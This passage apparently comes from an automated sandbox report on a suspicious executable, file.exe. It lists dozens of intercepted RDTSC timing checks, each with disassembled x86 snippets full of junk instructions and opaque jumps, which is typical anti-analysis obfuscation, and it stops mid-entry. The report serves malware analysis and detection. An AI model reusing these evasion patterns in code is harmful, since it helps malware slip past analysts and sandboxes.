              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D8F8 second address: C6D90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jng 00007F1F18DC15C6h 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D90A second address: C6D910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D910 second address: C6D914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E751 second address: C6E76D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E76D second address: C6E773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C72646 second address: C7264A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7264A second address: C7264E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7264E second address: C72654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7584C second address: C75890 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F1F18DC15C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D1B34h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F1F18DC15C8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push edi 0x00000032 pop edi 0x00000033 mov bl, 4Fh 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75890 second address: C75896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75896 second address: C7589B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7589B second address: C758A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F1851F5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7694B second address: C7694F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7694F second address: C76958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F919 second address: C7F953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F1F18DC15D9h 0x0000000a jmp 00007F1F18DC15D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D9AD second address: C1D9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F1851F5D6h 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F1F1851F5D6h 0x00000012 popad 0x00000013 jmp 00007F1F1851F5DAh 0x00000018 jnc 00007F1F1851F5DAh 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jnp 00007F1F1851F5D6h 0x00000028 jmp 00007F1F1851F5DDh 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D9EB second address: C1DA3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D8h 0x00000007 ja 00007F1F18DC15C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1F18DC15D0h 0x00000014 push ebx 0x00000015 jmp 00007F1F18DC15D5h 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1DA3A second address: C1DA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F0AF second address: C7F0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007F1F18DC15C6h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F0BF second address: C7F0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F1F9 second address: C7F1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F1FF second address: C7F203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83296 second address: C8329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8329C second address: C832B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C832B2 second address: C832B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C832B8 second address: C832CC instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F1851F5DAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c js 00007F1F1851F5DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74963 second address: C749C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F1F18DC15D2h 0x0000000e jno 00007F1F18DC15CCh 0x00000014 nop 0x00000015 mov ebx, dword ptr [ebp+122D18DDh] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 movsx edi, si 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov edi, dword ptr [ebp+122D38C1h] 0x00000032 mov eax, dword ptr [ebp+122D08CDh] 0x00000038 mov ebx, dword ptr [ebp+122D3805h] 0x0000003e push FFFFFFFFh 0x00000040 movzx edi, si 0x00000043 nop 0x00000044 push ecx 0x00000045 jns 00007F1F18DC15CCh 0x0000004b pop ecx 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8786A second address: C87874 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C759DD second address: C75A6B instructions: 0x00000000 rdtsc 0x00000002 js 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F1F18DC15D3h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov bh, 3Dh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F1F18DC15C8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000016h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov eax, dword ptr [ebp+122D0299h] 0x00000043 mov edi, dword ptr [ebp+122D3679h] 0x00000049 push FFFFFFFFh 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F1F18DC15C8h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D1929h], ebx 0x0000006b nop 0x0000006c jp 00007F1F18DC15D8h 0x00000072 push eax 0x00000073 push edx 0x00000074 jo 00007F1F18DC15C6h 0x0000007a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75A6B second address: C75A7B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C75A7B second address: C75A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C76BC0 second address: C76BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87B2A second address: C87B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D0h 0x00000009 popad 0x0000000a jp 00007F1F18DC15CCh 0x00000010 jbe 00007F1F18DC15C6h 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jnc 00007F1F18DC15CCh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DE0B second address: C8DE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5DFh 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E679 second address: C8E67D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E67D second address: C8E683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E683 second address: C8E6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F18DC15D9h 0x0000000c jmp 00007F1F18DC15D7h 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E83C second address: C8E844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E9B9 second address: C8E9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8EB41 second address: C8EB47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8EB47 second address: C8EB54 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F18DC15C8h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8EC9E second address: C8ECB4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F1F1851F5DCh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8ECB4 second address: C8ECBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F1F18DC15C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8ECBE second address: C8ECCC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F1F1851F5D6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8ECCC second address: C8ECD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8EF6D second address: C8EF77 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1F1851F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C94C2E second address: C94C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C934D4 second address: C934F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jp 00007F1F1851F5DEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C934F3 second address: C934FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C934FC second address: C93502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93502 second address: C93555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F1F18DC15D9h 0x0000000b jmp 00007F1F18DC15D0h 0x00000010 jmp 00007F1F18DC15D8h 0x00000015 jc 00007F1F18DC15C6h 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C936A4 second address: C936C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F1F1851F5D6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1F1851F5DCh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C936C0 second address: C936C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93837 second address: C93860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F1F1851F5DFh 0x0000000d je 00007F1F1851F5D8h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jng 00007F1F1851F5D6h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C939CB second address: C939D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C939D1 second address: C939DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C939DA second address: C939E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93B23 second address: C93B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1F1851F5D6h 0x0000000a jmp 00007F1F1851F5E4h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93B42 second address: C93B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93C91 second address: C93C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93E12 second address: C93E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93E31 second address: C93E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F1F1851F5E8h 0x00000013 jmp 00007F1F1851F5E7h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93E7B second address: C93E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15CBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93E8A second address: C93E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93E8E second address: C93E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1F18DC15C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C93E9A second address: C93EA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F1851F5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C945A0 second address: C945C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F18DC15C6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F18DC15D5h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C945C3 second address: C945DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1A4AD second address: C1A4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1A4B1 second address: C1A4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1F1851F5D8h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9321F second address: C93224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A2F9 second address: C9A2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A2FD second address: C9A301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A301 second address: C9A334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F1851F5DCh 0x0000000c jmp 00007F1F1851F5E5h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F1F1851F5D6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A4A6 second address: C9A4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F18DC15CBh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9A4B8 second address: C9A4BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9AAFF second address: C9AB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9AB05 second address: C9AB17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DED3 second address: C9DED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DED8 second address: C9DEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DEDE second address: C9DEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F18DC15CEh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DEF3 second address: C9DEFD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F1851F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DEFD second address: C9DF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DF0A second address: C9DF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DF0E second address: C9DF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA14BB second address: CA14D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F1F1851F5E2h 0x0000000c jmp 00007F1F1851F5DCh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C4BD second address: C5C4DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C4DA second address: C5C4EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C4EA second address: C5C4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15CEh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C4FD second address: C5C517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F1851F5E6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C517 second address: C40271 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F1F18DC15C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D1AA3h] 0x0000002d mov cx, di 0x00000030 lea eax, dword ptr [ebp+1248C226h] 0x00000036 mov dword ptr [ebp+122D1986h], esi 0x0000003c nop 0x0000003d jnp 00007F1F18DC15DFh 0x00000043 jmp 00007F1F18DC15D9h 0x00000048 push eax 0x00000049 push eax 0x0000004a push esi 0x0000004b jmp 00007F1F18DC15CBh 0x00000050 pop esi 0x00000051 pop eax 0x00000052 nop 0x00000053 xor dword ptr [ebp+122D1FB2h], edi 0x00000059 add dh, 00000027h 0x0000005c call dword ptr [ebp+1245CB78h] 0x00000062 